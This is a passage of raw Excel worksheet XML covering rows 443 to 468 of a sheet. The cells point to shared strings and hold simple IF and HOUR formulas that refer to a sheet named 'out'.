      <c r="T443" s="4"/>
      <c r="U443" s="4"/>
      <c r="V443" s="7"/>
    </row>
    <row r="444" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A444" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B444" s="4" t="s">
        <v>2480</v>
      </c>
      <c r="C444" s="4" t="s">
        <v>2481</v>
      </c>
      <c r="D444" s="4" t="s">
        <v>2482</v>
      </c>
      <c r="E444" s="4" t="s">
        <v>2483</v>
      </c>
      <c r="F444" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G444" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H444" s="4">
        <v>7.1</v>
      </c>
      <c r="I444" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J444" s="4"/>
      <c r="K444" s="4"/>
      <c r="L444" s="4">
        <f>IF(out!$G444="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M444" s="4"/>
      <c r="N444" s="4"/>
      <c r="O444" s="13"/>
      <c r="P444" s="4"/>
      <c r="Q444" s="13">
        <f>HOUR(out!$P444 -out!$N444)</f>
        <v>0</v>
      </c>
      <c r="R444" s="18"/>
      <c r="S444" s="4"/>
      <c r="T444" s="4"/>
      <c r="U444" s="4"/>
      <c r="V444" s="7"/>
    </row>
    <row r="445" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A445" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B445" s="4" t="s">
        <v>2484</v>
      </c>
      <c r="C445" s="4" t="s">
        <v>2485</v>
      </c>
      <c r="D445" s="4" t="s">
        <v>2486</v>
      </c>
      <c r="E445" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="F445" s="4" t="s">
        <v>2488</v>
      </c>
      <c r="G445" s="4" t="s">
        <v>2489</v>
      </c>
      <c r="H445" s="4">
        <v>7.1</v>
      </c>
      <c r="I445" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J445" s="4"/>
      <c r="K445" s="4"/>
      <c r="L445" s="4">
        <f>IF(out!$G445="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M445" s="4"/>
      <c r="N445" s="4"/>
      <c r="O445" s="13"/>
      <c r="P445" s="4"/>
      <c r="Q445" s="13">
        <f>HOUR(out!$P445 -out!$N445)</f>
        <v>0</v>
      </c>
      <c r="R445" s="18"/>
      <c r="S445" s="4"/>
      <c r="T445" s="4"/>
      <c r="U445" s="4"/>
      <c r="V445" s="7"/>
    </row>
    <row r="446" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A446" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B446" s="4" t="s">
        <v>2490</v>
      </c>
      <c r="C446" s="4" t="s">
        <v>2491</v>
      </c>
      <c r="D446" s="4" t="s">
        <v>2492</v>
      </c>
      <c r="E446" s="4" t="s">
        <v>2493</v>
      </c>
      <c r="F446" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G446" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H446" s="4">
        <v>7.1</v>
      </c>
      <c r="I446" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J446" s="4"/>
      <c r="K446" s="4"/>
      <c r="L446" s="4">
        <f>IF(out!$G446="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M446" s="4"/>
      <c r="N446" s="4"/>
      <c r="O446" s="13"/>
      <c r="P446" s="4"/>
      <c r="Q446" s="13">
        <f>HOUR(out!$P446 -out!$N446)</f>
        <v>0</v>
      </c>
      <c r="R446" s="18"/>
      <c r="S446" s="4"/>
      <c r="T446" s="4"/>
      <c r="U446" s="4"/>
      <c r="V446" s="7"/>
    </row>
    <row r="447" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A447" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B447" s="4" t="s">
        <v>2494</v>
      </c>
      <c r="C447" s="4" t="s">
        <v>2495</v>
      </c>
      <c r="D447" s="4" t="s">
        <v>2496</v>
      </c>
      <c r="E447" s="4" t="s">
        <v>2497</v>
      </c>
      <c r="F447" s="4" t="s">
        <v>2498</v>
      </c>
      <c r="G447" s="4" t="s">
        <v>2499</v>
      </c>
      <c r="H447" s="4">
        <v>7.1</v>
      </c>
      <c r="I447" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J447" s="4"/>
      <c r="K447" s="4"/>
      <c r="L447" s="4">
        <f>IF(out!$G447="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M447" s="4"/>
      <c r="N447" s="4"/>
      <c r="O447" s="13"/>
      <c r="P447" s="4"/>
      <c r="Q447" s="13">
        <f>HOUR(out!$P447 -out!$N447)</f>
        <v>0</v>
      </c>
      <c r="R447" s="18"/>
      <c r="S447" s="4"/>
      <c r="T447" s="4"/>
      <c r="U447" s="4"/>
      <c r="V447" s="7"/>
    </row>
    <row r="448" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A448" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B448" s="4" t="s">
        <v>2500</v>
      </c>
      <c r="C448" s="4" t="s">
        <v>2501</v>
      </c>
      <c r="D448" s="4" t="s">
        <v>2502</v>
      </c>
      <c r="E448" s="4" t="s">
        <v>2503</v>
      </c>
      <c r="F448" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G448" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H448" s="4">
        <v>7.1</v>
      </c>
      <c r="I448" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J448" s="4"/>
      <c r="K448" s="4"/>
      <c r="L448" s="4">
        <f>IF(out!$G448="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M448" s="4"/>
      <c r="N448" s="4"/>
      <c r="O448" s="13"/>
      <c r="P448" s="4"/>
      <c r="Q448" s="13">
        <f>HOUR(out!$P448 -out!$N448)</f>
        <v>0</v>
      </c>
      <c r="R448" s="18"/>
      <c r="S448" s="4"/>
      <c r="T448" s="4"/>
      <c r="U448" s="4"/>
      <c r="V448" s="7"/>
    </row>
    <row r="449" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A449" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B449" s="4" t="s">
        <v>2504</v>
      </c>
      <c r="C449" s="4" t="s">
        <v>2505</v>
      </c>
      <c r="D449" s="4" t="s">
        <v>2506</v>
      </c>
      <c r="E449" s="4" t="s">
        <v>2507</v>
      </c>
      <c r="F449" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G449" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H449" s="4">
        <v>7.1</v>
      </c>
      <c r="I449" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J449" s="4"/>
      <c r="K449" s="4"/>
      <c r="L449" s="4">
        <f>IF(out!$G449="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M449" s="4"/>
      <c r="N449" s="4"/>
      <c r="O449" s="13"/>
      <c r="P449" s="4"/>
      <c r="Q449" s="13">
        <f>HOUR(out!$P449 -out!$N449)</f>
        <v>0</v>
      </c>
      <c r="R449" s="18"/>
      <c r="S449" s="4"/>
      <c r="T449" s="4"/>
      <c r="U449" s="4"/>
      <c r="V449" s="7"/>
    </row>
    <row r="450" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A450" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B450" s="4" t="s">
        <v>2508</v>
      </c>
      <c r="C450" s="4" t="s">
        <v>2509</v>
      </c>
      <c r="D450" s="4" t="s">
        <v>2510</v>
      </c>
      <c r="E450" s="4" t="s">
        <v>2511</v>
      </c>
      <c r="F450" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G450" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H450" s="4">
        <v>7.1</v>
      </c>
      <c r="I450" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J450" s="4"/>
      <c r="K450" s="4"/>
      <c r="L450" s="4">
        <f>IF(out!$G450="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M450" s="4"/>
      <c r="N450" s="4"/>
      <c r="O450" s="13"/>
      <c r="P450" s="4"/>
      <c r="Q450" s="13">
        <f>HOUR(out!$P450 -out!$N450)</f>
        <v>0</v>
      </c>
      <c r="R450" s="18"/>
      <c r="S450" s="4"/>
      <c r="T450" s="4"/>
      <c r="U450" s="4"/>
      <c r="V450" s="7"/>
    </row>
    <row r="451" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A451" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B451" s="4" t="s">
        <v>2512</v>
      </c>
      <c r="C451" s="4" t="s">
        <v>2513</v>
      </c>
      <c r="D451" s="4" t="s">
        <v>2514</v>
      </c>
      <c r="E451" s="4" t="s">
        <v>2515</v>
      </c>
      <c r="F451" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G451" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H451" s="4">
        <v>7.1</v>
      </c>
      <c r="I451" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J451" s="4"/>
      <c r="K451" s="4"/>
      <c r="L451" s="4">
        <f>IF(out!$G451="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M451" s="4"/>
      <c r="N451" s="4"/>
      <c r="O451" s="13"/>
      <c r="P451" s="4"/>
      <c r="Q451" s="13">
        <f>HOUR(out!$P451 -out!$N451)</f>
        <v>0</v>
      </c>
      <c r="R451" s="18"/>
      <c r="S451" s="4"/>
      <c r="T451" s="4"/>
      <c r="U451" s="4"/>
      <c r="V451" s="7"/>
    </row>
    <row r="452" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A452" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B452" s="4" t="s">
        <v>2516</v>
      </c>
      <c r="C452" s="4" t="s">
        <v>2517</v>
      </c>
      <c r="D452" s="4" t="s">
        <v>2518</v>
      </c>
      <c r="E452" s="4" t="s">
        <v>2519</v>
      </c>
      <c r="F452" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G452" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H452" s="4">
        <v>7.1</v>
      </c>
      <c r="I452" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J452" s="4"/>
      <c r="K452" s="4"/>
      <c r="L452" s="4">
        <f>IF(out!$G452="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M452" s="4"/>
      <c r="N452" s="4"/>
      <c r="O452" s="13"/>
      <c r="P452" s="4"/>
      <c r="Q452" s="13">
        <f>HOUR(out!$P452 -out!$N452)</f>
        <v>0</v>
      </c>
      <c r="R452" s="18"/>
      <c r="S452" s="4"/>
      <c r="T452" s="4"/>
      <c r="U452" s="4"/>
      <c r="V452" s="7"/>
    </row>
    <row r="453" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A453" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B453" s="4" t="s">
        <v>2520</v>
      </c>
      <c r="C453" s="4" t="s">
        <v>2521</v>
      </c>
      <c r="D453" s="4" t="s">
        <v>2522</v>
      </c>
      <c r="E453" s="4" t="s">
        <v>2523</v>
      </c>
      <c r="F453" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G453" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H453" s="4">
        <v>7.1</v>
      </c>
      <c r="I453" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J453" s="4"/>
      <c r="K453" s="4"/>
      <c r="L453" s="4">
        <f>IF(out!$G453="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M453" s="4"/>
      <c r="N453" s="4"/>
      <c r="O453" s="13"/>
      <c r="P453" s="4"/>
      <c r="Q453" s="13">
        <f>HOUR(out!$P453 -out!$N453)</f>
        <v>0</v>
      </c>
      <c r="R453" s="18"/>
      <c r="S453" s="4"/>
      <c r="T453" s="4"/>
      <c r="U453" s="4"/>
      <c r="V453" s="7"/>
    </row>
    <row r="454" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A454" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B454" s="4" t="s">
        <v>2524</v>
      </c>
      <c r="C454" s="4" t="s">
        <v>2525</v>
      </c>
      <c r="D454" s="4" t="s">
        <v>2526</v>
      </c>
      <c r="E454" s="4" t="s">
        <v>2527</v>
      </c>
      <c r="F454" s="4" t="s">
        <v>2528</v>
      </c>
      <c r="G454" s="4" t="s">
        <v>2529</v>
      </c>
      <c r="H454" s="4">
        <v>7.1</v>
      </c>
      <c r="I454" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J454" s="4"/>
      <c r="K454" s="4"/>
      <c r="L454" s="4">
        <f>IF(out!$G454="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M454" s="4"/>
      <c r="N454" s="4"/>
      <c r="O454" s="13"/>
      <c r="P454" s="4"/>
      <c r="Q454" s="13">
        <f>HOUR(out!$P454 -out!$N454)</f>
        <v>0</v>
      </c>
      <c r="R454" s="18"/>
      <c r="S454" s="4"/>
      <c r="T454" s="4"/>
      <c r="U454" s="4"/>
      <c r="V454" s="7"/>
    </row>
    <row r="455" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A455" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B455" s="4" t="s">
        <v>2530</v>
      </c>
      <c r="C455" s="4" t="s">
        <v>2531</v>
      </c>
      <c r="D455" s="4" t="s">
        <v>2532</v>
      </c>
      <c r="E455" s="4" t="s">
        <v>2533</v>
      </c>
      <c r="F455" s="4" t="s">
        <v>2534</v>
      </c>
      <c r="G455" s="4" t="s">
        <v>2535</v>
      </c>
      <c r="H455" s="4">
        <v>7.1</v>
      </c>
      <c r="I455" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J455" s="4"/>
      <c r="K455" s="4"/>
      <c r="L455" s="4">
        <f>IF(out!$G455="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M455" s="4"/>
      <c r="N455" s="4"/>
      <c r="O455" s="13"/>
      <c r="P455" s="4"/>
      <c r="Q455" s="13">
        <f>HOUR(out!$P455 -out!$N455)</f>
        <v>0</v>
      </c>
      <c r="R455" s="18"/>
      <c r="S455" s="4"/>
      <c r="T455" s="4"/>
      <c r="U455" s="4"/>
      <c r="V455" s="7"/>
    </row>
    <row r="456" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A456" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B456" s="4" t="s">
        <v>2536</v>
      </c>
      <c r="C456" s="4" t="s">
        <v>2537</v>
      </c>
      <c r="D456" s="4" t="s">
        <v>2538</v>
      </c>
      <c r="E456" s="4" t="s">
        <v>2539</v>
      </c>
      <c r="F456" s="4" t="s">
        <v>701</v>
      </c>
      <c r="G456" s="4" t="s">
        <v>702</v>
      </c>
      <c r="H456" s="4">
        <v>7.1</v>
      </c>
      <c r="I456" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J456" s="4"/>
      <c r="K456" s="4"/>
      <c r="L456" s="4">
        <f>IF(out!$G456="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M456" s="4"/>
      <c r="N456" s="4"/>
      <c r="O456" s="13"/>
      <c r="P456" s="4"/>
      <c r="Q456" s="13">
        <f>HOUR(out!$P456 -out!$N456)</f>
        <v>0</v>
      </c>
      <c r="R456" s="18"/>
      <c r="S456" s="4"/>
      <c r="T456" s="4"/>
      <c r="U456" s="4"/>
      <c r="V456" s="7"/>
    </row>
    <row r="457" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A457" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B457" s="4" t="s">
        <v>2540</v>
      </c>
      <c r="C457" s="4" t="s">
        <v>2541</v>
      </c>
      <c r="D457" s="4" t="s">
        <v>2542</v>
      </c>
      <c r="E457" s="4" t="s">
        <v>2543</v>
      </c>
      <c r="F457" s="4" t="s">
        <v>430</v>
      </c>
      <c r="G457" s="4" t="s">
        <v>431</v>
      </c>
      <c r="H457" s="4">
        <v>7.1</v>
      </c>
      <c r="I457" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J457" s="4"/>
      <c r="K457" s="4"/>
      <c r="L457" s="4">
        <f>IF(out!$G457="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M457" s="4"/>
      <c r="N457" s="4"/>
      <c r="O457" s="13"/>
      <c r="P457" s="4"/>
      <c r="Q457" s="13">
        <f>HOUR(out!$P457 -out!$N457)</f>
        <v>0</v>
      </c>
      <c r="R457" s="18"/>
      <c r="S457" s="4"/>
      <c r="T457" s="4"/>
      <c r="U457" s="4"/>
      <c r="V457" s="7"/>
    </row>
    <row r="458" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A458" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B458" s="4" t="s">
        <v>2544</v>
      </c>
      <c r="C458" s="4" t="s">
        <v>2545</v>
      </c>
      <c r="D458" s="4" t="s">
        <v>2546</v>
      </c>
      <c r="E458" s="4" t="s">
        <v>2547</v>
      </c>
      <c r="F458" s="4" t="s">
        <v>568</v>
      </c>
      <c r="G458" s="4" t="s">
        <v>569</v>
      </c>
      <c r="H458" s="4">
        <v>7.1</v>
      </c>
      <c r="I458" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J458" s="4"/>
      <c r="K458" s="4"/>
      <c r="L458" s="4">
        <f>IF(out!$G458="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M458" s="4"/>
      <c r="N458" s="4"/>
      <c r="O458" s="13"/>
      <c r="P458" s="4"/>
      <c r="Q458" s="13">
        <f>HOUR(out!$P458 -out!$N458)</f>
        <v>0</v>
      </c>
      <c r="R458" s="18"/>
      <c r="S458" s="4"/>
      <c r="T458" s="4"/>
      <c r="U458" s="4"/>
      <c r="V458" s="7"/>
    </row>
    <row r="459" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A459" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B459" s="4" t="s">
        <v>2548</v>
      </c>
      <c r="C459" s="4" t="s">
        <v>2549</v>
      </c>
      <c r="D459" s="4" t="s">
        <v>2550</v>
      </c>
      <c r="E459" s="4" t="s">
        <v>2551</v>
      </c>
      <c r="F459" s="4" t="s">
        <v>2552</v>
      </c>
      <c r="G459" s="4" t="s">
        <v>784</v>
      </c>
      <c r="H459" s="4">
        <v>7.1</v>
      </c>
      <c r="I459" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J459" s="4"/>
      <c r="K459" s="4"/>
      <c r="L459" s="4">
        <f>IF(out!$G459="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M459" s="4"/>
      <c r="N459" s="4"/>
      <c r="O459" s="13"/>
      <c r="P459" s="4"/>
      <c r="Q459" s="13">
        <f>HOUR(out!$P459 -out!$N459)</f>
        <v>0</v>
      </c>
      <c r="R459" s="18"/>
      <c r="S459" s="4"/>
      <c r="T459" s="4"/>
      <c r="U459" s="4"/>
      <c r="V459" s="7"/>
    </row>
    <row r="460" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A460" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B460" s="4" t="s">
        <v>2553</v>
      </c>
      <c r="C460" s="4" t="s">
        <v>2554</v>
      </c>
      <c r="D460" s="4" t="s">
        <v>2555</v>
      </c>
      <c r="E460" s="4" t="s">
        <v>2556</v>
      </c>
      <c r="F460" s="4" t="s">
        <v>721</v>
      </c>
      <c r="G460" s="4" t="s">
        <v>722</v>
      </c>
      <c r="H460" s="4">
        <v>7.1</v>
      </c>
      <c r="I460" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J460" s="4"/>
      <c r="K460" s="4"/>
      <c r="L460" s="4">
        <f>IF(out!$G460="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M460" s="4"/>
      <c r="N460" s="4"/>
      <c r="O460" s="13"/>
      <c r="P460" s="4"/>
      <c r="Q460" s="13">
        <f>HOUR(out!$P460 -out!$N460)</f>
        <v>0</v>
      </c>
      <c r="R460" s="18"/>
      <c r="S460" s="4"/>
      <c r="T460" s="4"/>
      <c r="U460" s="4"/>
      <c r="V460" s="7"/>
    </row>
    <row r="461" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A461" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B461" s="4" t="s">
        <v>2557</v>
      </c>
      <c r="C461" s="4" t="s">
        <v>2558</v>
      </c>
      <c r="D461" s="4" t="s">
        <v>2559</v>
      </c>
      <c r="E461" s="4" t="s">
        <v>2560</v>
      </c>
      <c r="F461" s="4" t="s">
        <v>2561</v>
      </c>
      <c r="G461" s="4" t="s">
        <v>2562</v>
      </c>
      <c r="H461" s="4">
        <v>7.1</v>
      </c>
      <c r="I461" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J461" s="4"/>
      <c r="K461" s="4"/>
      <c r="L461" s="4">
        <f>IF(out!$G461="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M461" s="4"/>
      <c r="N461" s="4"/>
      <c r="O461" s="13"/>
      <c r="P461" s="4"/>
      <c r="Q461" s="13">
        <f>HOUR(out!$P461 -out!$N461)</f>
        <v>0</v>
      </c>
      <c r="R461" s="18"/>
      <c r="S461" s="4"/>
      <c r="T461" s="4"/>
      <c r="U461" s="4"/>
      <c r="V461" s="7"/>
    </row>
    <row r="462" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A462" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B462" s="4" t="s">
        <v>2563</v>
      </c>
      <c r="C462" s="4" t="s">
        <v>2564</v>
      </c>
      <c r="D462" s="4" t="s">
        <v>2565</v>
      </c>
      <c r="E462" s="4" t="s">
        <v>2566</v>
      </c>
      <c r="F462" s="4" t="s">
        <v>2567</v>
      </c>
      <c r="G462" s="4" t="s">
        <v>2568</v>
      </c>
      <c r="H462" s="4">
        <v>7.1</v>
      </c>
      <c r="I462" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J462" s="4"/>
      <c r="K462" s="4"/>
      <c r="L462" s="4">
        <f>IF(out!$G462="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M462" s="4"/>
      <c r="N462" s="4"/>
      <c r="O462" s="13"/>
      <c r="P462" s="4"/>
      <c r="Q462" s="13">
        <f>HOUR(out!$P462 -out!$N462)</f>
        <v>0</v>
      </c>
      <c r="R462" s="18"/>
      <c r="S462" s="4"/>
      <c r="T462" s="4"/>
      <c r="U462" s="4"/>
      <c r="V462" s="7"/>
    </row>
    <row r="463" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A463" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B463" s="4" t="s">
        <v>2569</v>
      </c>
      <c r="C463" s="4" t="s">
        <v>2570</v>
      </c>
      <c r="D463" s="4" t="s">
        <v>2571</v>
      </c>
      <c r="E463" s="4" t="s">
        <v>2572</v>
      </c>
      <c r="F463" s="4" t="s">
        <v>2573</v>
      </c>
      <c r="G463" s="4" t="s">
        <v>2574</v>
      </c>
      <c r="H463" s="4">
        <v>7.1</v>
      </c>
      <c r="I463" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J463" s="4"/>
      <c r="K463" s="4"/>
      <c r="L463" s="4">
        <f>IF(out!$G463="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M463" s="4"/>
      <c r="N463" s="4"/>
      <c r="O463" s="13"/>
      <c r="P463" s="4"/>
      <c r="Q463" s="13">
        <f>HOUR(out!$P463 -out!$N463)</f>
        <v>0</v>
      </c>
      <c r="R463" s="18"/>
      <c r="S463" s="4"/>
      <c r="T463" s="4"/>
      <c r="U463" s="4"/>
      <c r="V463" s="7"/>
    </row>
    <row r="464" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A464" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B464" s="4" t="s">
        <v>2575</v>
      </c>
      <c r="C464" s="4" t="s">
        <v>2576</v>
      </c>
      <c r="D464" s="4" t="s">
        <v>2577</v>
      </c>
      <c r="E464" s="4" t="s">
        <v>2578</v>
      </c>
      <c r="F464" s="4" t="s">
        <v>2579</v>
      </c>
      <c r="G464" s="4" t="s">
        <v>198</v>
      </c>
      <c r="H464" s="4">
        <v>7.1</v>
      </c>
      <c r="I464" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J464" s="4"/>
      <c r="K464" s="4"/>
      <c r="L464" s="4">
        <f>IF(out!$G464="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M464" s="4"/>
      <c r="N464" s="4"/>
      <c r="O464" s="13"/>
      <c r="P464" s="4"/>
      <c r="Q464" s="13">
        <f>HOUR(out!$P464 -out!$N464)</f>
        <v>0</v>
      </c>
      <c r="R464" s="18"/>
      <c r="S464" s="4"/>
      <c r="T464" s="4"/>
      <c r="U464" s="4"/>
      <c r="V464" s="7"/>
    </row>
    <row r="465" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A465" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B465" s="4" t="s">
        <v>2580</v>
      </c>
      <c r="C465" s="4" t="s">
        <v>2581</v>
      </c>
      <c r="D465" s="4" t="s">
        <v>2582</v>
      </c>
      <c r="E465" s="4" t="s">
        <v>2583</v>
      </c>
      <c r="F465" s="4" t="s">
        <v>2584</v>
      </c>
      <c r="G465" s="4" t="s">
        <v>2585</v>
      </c>
      <c r="H465" s="4">
        <v>7.1</v>
      </c>
      <c r="I465" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J465" s="4"/>
      <c r="K465" s="4"/>
      <c r="L465" s="4">
        <f>IF(out!$G465="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M465" s="4"/>
      <c r="N465" s="4"/>
      <c r="O465" s="13"/>
      <c r="P465" s="4"/>
      <c r="Q465" s="13">
        <f>HOUR(out!$P465 -out!$N465)</f>
        <v>0</v>
      </c>
      <c r="R465" s="18"/>
      <c r="S465" s="4"/>
      <c r="T465" s="4"/>
      <c r="U465" s="4"/>
      <c r="V465" s="7"/>
    </row>
    <row r="466" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A466" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B466" s="4" t="s">
        <v>2586</v>
      </c>
      <c r="C466" s="4" t="s">
        <v>2587</v>
      </c>
      <c r="D466" s="4" t="s">
        <v>2588</v>
      </c>
      <c r="E466" s="4" t="s">
        <v>2589</v>
      </c>
      <c r="F466" s="4" t="s">
        <v>2590</v>
      </c>
      <c r="G466" s="4" t="s">
        <v>2591</v>
      </c>
      <c r="H466" s="4">
        <v>7.1</v>
      </c>
      <c r="I466" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J466" s="4"/>
      <c r="K466" s="4"/>
      <c r="L466" s="4">
        <f>IF(out!$G466="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M466" s="4"/>
      <c r="N466" s="4"/>
      <c r="O466" s="13"/>
      <c r="P466" s="4"/>
      <c r="Q466" s="13">
        <f>HOUR(out!$P466 -out!$N466)</f>
        <v>0</v>
      </c>
      <c r="R466" s="18"/>
      <c r="S466" s="4"/>
      <c r="T466" s="4"/>
      <c r="U466" s="4"/>
      <c r="V466" s="7"/>
    </row>
    <row r="467" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A467" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B467" s="4" t="s">
        <v>2592</v>
      </c>
      <c r="C467" s="4" t="s">
        <v>2593</v>
      </c>
      <c r="D467" s="4" t="s">
        <v>2594</v>
      </c>
      <c r="E467" s="4" t="s">
        <v>2595</v>
      </c>
      <c r="F467" s="4" t="s">
        <v>2596</v>
      </c>
      <c r="G467" s="4" t="s">
        <v>1820</v>
      </c>
      <c r="H467" s="4">
        <v>7.1</v>
      </c>
      <c r="I467" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J467" s="4"/>
      <c r="K467" s="4"/>
      <c r="L467" s="4">
        <f>IF(out!$G467="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M467" s="4"/>
      <c r="N467" s="4"/>
      <c r="O467" s="13"/>
      <c r="P467" s="4"/>
      <c r="Q467" s="13">
        <f>HOUR(out!$P467 -out!$N467)</f>
        <v>0</v>
      </c>
      <c r="R467" s="18"/>
      <c r="S467" s="4"/>
      <c r="T467" s="4"/>
      <c r="U467" s="4"/>
      <c r="V467" s="7"/>
    </row>
    <row r="468" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A468" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B468" s="4" t="s">
        <v>2597</v>
      </c>
      <c r="C468" s="4" t="s">
        <v>2598</v>
      </c>
      <c r="D468" s="4" t="s">
        <v>2599</v>
      </c>
      <c r="E468" s="4" t="s">
        <v>2600</v>
      </c>
      <c r="F468" s="4" t="s">
        <v>661</v>
      </c>
      <c r="G468" s="4" t="s">
        <v>662</v>
      </c>
      <c r="H468" s="4">
        <v>7.1</v>
      </c>
      <c r="I468" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J468" s="4"/>
      <c r="K468" s="4"/>
      <c r="L468" s="4">
        <f>IF(out!$G468="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M468" s="4"/>
      <c r="N468" s="4"/>
      <c r="O468" s="13"/>
      <c r="P468" s="4"/>
      <c r="Q468" s="13">
        <f>HOUR(out!$P468 -out!$N468)</f>
        <v>0</v>
      </c>
      <c r="R468" s="18"/>
      <c r="S468" s="4"/>
      <c r="T468" s="4"/>
